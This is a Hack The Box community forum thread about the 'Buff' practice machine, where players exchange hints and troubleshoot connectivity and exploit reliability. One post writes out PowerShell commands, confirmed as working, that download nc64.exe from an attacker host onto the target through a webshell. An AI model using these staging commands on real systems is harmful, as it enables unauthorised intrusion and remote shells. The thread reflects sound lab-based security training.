Official Buff Discussion

13468933

Comments

  • @orc said:

    Can someone give me a nudge please? I believe I am stuck on root with the /a***n page. I have not gotten user yet.

    Look at a different page. Gather information and see what you can do with it.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • Type your comment> @choupit0 said:

    Type your comment> @lovesay said:

    What is a surefire way to get a file onto the remote machine via a webshell? If I don't run with powershell.exe before the command it says the command is not recognized so is the webshell not actually talking to powershell? If I run it with the powershell.exe I get an error saying the machine cant connect to my remote server which I'm hosting with python. I can ping my attack machine so I know the IP is correct and the interface is working but still unsure what is happening.

    I have tried the following:

    IEX (New-Object System.Net.WebClient).DownloadFile('http://10.10.xx.xx/nc64.exe', 'nc64.exe')

    Invoke-WebRequest -Uri 'http://10.10.xx.xx/nc64.exe'-OutFile 'nc64.exe'

    powershell.exe wget http://10.10.xx.xx/nc64.exe

    And the curl command?... Directly from the directory where your shell landed.

    Yeah that works too. Thanks for the insight. I'm just glad I was able to confirm that these commands should work when input correctly rather than thinking it was something else.

  • edited July 2020

    Is unbearable lag supposed to be part of the challenge?
    I've gotten user but can't proceed to basic enum since the box is evidently running on vacuum tubes.

  • @red404 said:

    Is unbearable lag supposed to be part of the challenge?
    I've gotten user but can't proceed to basic enum since the box is evidently running on vacuum tubes.

    This isn't something I noticed. It may depend on many variables.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • Can someone help me? when tunneling I get this error "failed: Network error: Address already in use".

  • @regrews said:

    Can someone help me? when tunneling I get this error "failed: Network error: Address already in use".

    It implies a port you are trying to use is already being used by something.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • Bit a noob here. I'm looking to gain access and found the a**** page and I know there's a method there. Can someone give me a nudge of what my next step should be? Looking for a direction

  • edited July 2020

    Does anyone have a resource that can help me setup the p****.*** connection? I've got user, an exploit for root, and i know where it needs to go, but i'm no bridge builder yet.

    elseif

  • edited July 2020

    @elseif said:

    Does anyone have a resource that can help me setup the p****.*** connection? I've got user, an exploit for root, and i know where it needs to go, but i'm no bridge builder yet.

    You can find plenty of resources on how to build a bridge with p*, google and you will find what you need.
    If you still don't find what you need, i think there is a video from ippsec, that cover the tool (go to ippsec.rocks and find your grail).

    Other tools also can be used to make your way if you are more familiar with them, but you need to upload them (like c****l).

    'These violent delights have violent ends'

  • @NiroSpecter said:

    Bit a noob here. I'm looking to gain access and found the a**** page and I know there's a method there. Can someone give me a nudge of what my next step should be? Looking for a direction

    I would look at different pages. If you enumerate what is shown, there is a big sign which says what you need to do to exploit the box.

    As an example, I rooted the box before I realised the page you mention even existed.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • Is it just me, or is this box not responding rn?

  • at some point it would be a good idea for HTB to enforce a limit on machine resets based on user. This will force the players to be a little bit more creative and careful.

    By having to re-establish your user shell every 3-5 minutes does not help anyone.

    Rayz

  • @Rayz said:

    at some point it would be a good idea for HTB to enforce a limit on machine resets based on user. This will force the players to be a little bit more creative and careful.

    By having to re-establish your user shell every 3-5 minutes does not help anyone.

    I think non-VIP users have a limited number of resets. Unfortunately, if 500 people are hitting a box, even one reset each is challenging.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • Just a couple of general comments based on questions I've been getting:

    1) If you use an exploit from ExploitDB - make sure you read it to understand what it is doing. If you simply copy and paste it as is there is a really good chance it wont work.

    2) Read the comments/instructions but they aren't always correct. Read them and see if you can follow the bits in the code to see what you'd need to do differently in practice.

    3) Think about networking. If you are pushing multiple connections, you need multiple ports.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • I don't know if it is a bug or something like that, but the service running on a port is highly unstable. Yesterday I was able to get a root shell which died because of AV, but today I can't even do this since the port is not listening and restarting the program doesn't help at all. I was resetting box for multiple hours to do the step that I have already done but no luck. This is very frustrating guys.

  • edited July 2020

    Use pxxxxxx version, use nx for sxxxxxxxx

    Hack The Box

  • First a caveat that it may well depend on what other people are doing - if people are launching stupid attacks, stupid things happen.

    With that said, I found this pretty rock solid. The exploit worked the first time and the connection was stable enough for me to look around for as long as I wanted. Both user and root felt robust.

    Having said that, remember you are exploiting a system to make it do things it wasn't ever designed to do. If you are overflowing a buffer and pushing shellcode into memory you will never have a totally stable environment. People need to expect exploits to fail sometimes and occasionally you will need to run it 3, 4 or more times to get it to work. This isn't a problem with the "box", its the nature of exploitation.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • so the user was prrety easy my problam is with root i have tried diffrent exploit but no luck any useful ideas?

    Blacksnufkin

  • edited July 2020

    Type your comment> @Blacksnufkin said:

    so the user was prrety easy my problam is with root i have tried diffrent exploit but no luck any useful ideas?

    Did you modify the payload of each exploit ? did you tried all the exploit that you have found ?

    'These violent delights have violent ends'

  • edited July 2020

    Type your comment> @lovesay said:

    Type your comment> @Phrenesis2k said:

    Invoke-WebRequest should work. Try a full path in the -outfile

    That was it so it seems. Thank you so much. The issue now is some kind of lag that causes the file not to be downloaded. It shows the file in the remote machines directory but with size 0. I assume this is a network issue.

    Update: Running a personal VPN on top of OpenVPN seems to cause some issues.

    I agree, I had to connect to the htb OpenVPN first which defeats the purpose of a personal VPN. I think it has to do with the name of the interface because I could connect to my personal VPN after I connected to the htb vpn. I haven't had a chance to check the .ovpn to check. The problem, your public IP might not be hidden if you have to connect to the htb first. I think the admins of this site do the best they can to make sure you are not exposed but nothing is 100% secure, EVER. Sorry prob the wrong place to have this discussion.

    Huejash0le

  • Type your comment> @Caracal said:

    Type your comment> @Blacksnufkin said:

    so the user was prrety easy my problam is with root i have tried diffrent exploit but no luck any useful ideas?

    Did you modify the payload of each exploit ? did you tried all the exploit that you have found ?

    yes i did problay not the right modifications

    Blacksnufkin

  • Spoiler Removed

  • Spoiler Removed

    Fr0Ggi3sOnTour

  • edited July 2020

    Spoiler Removed

    Fr0Ggi3sOnTour

  • Rooted. Feel free to pm for a nudge but make sure you're prepared to tell me what you've tried first.

    Hack The Box

  • edited July 2020

    @choupit0

    Give hints but do not explain each step of privesc, because it's still a spoiler.
    Like HTB rules says : Dont share how you hacked each machine with other members.

    https://www.hackthebox.eu/home/rules

    'These violent delights have violent ends'

  • Type your comment> @Caracal said:

    @choupit0

    Give hints but do not explain each step of privesc, because it's still a spoiler.
    Like HTB rules says : Dont share how you hacked each machine with other members.

    https://www.hackthebox.eu/home/rules

    Okay.

    Fr0Ggi3sOnTour

  • i'm sorry for silly question. i have scanned and enumerated, find exploit on exploit-db modified to work (some parenthesis) and runned over buff. it gives successfully connected to webshell but then immediately exiting without the shell . Some hint thank you in advance

  • @maurotambo said:

    i'm sorry for silly question. i have scanned and enumerated, find exploit on exploit-db modified to work (some parenthesis) and runned over buff. it gives successfully connected to webshell but then immediately exiting without the shell . Some hint thank you in advance

    If this is for user then the exploit doesn't really give you a shell (well it does, but this sucks and you quickly want something else), it gives you RCE.

    If you read the instructions in the exploit it tells you what you need to do - although some of this is wrong, you can work out what you need to change by the code of the exploit.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • edited July 2020

    @maurotambo said:

    i'm sorry for silly question. i have scanned and enumerated, find exploit on exploit-db modified to work (some parenthesis) and runned over buff. it gives successfully connected to webshell but then immediately exiting without the shell . Some hint thank you in advance

    You need to hit the right page and gave the right parameters to have RCE.

    'These violent delights have violent ends'

Sign In to comment.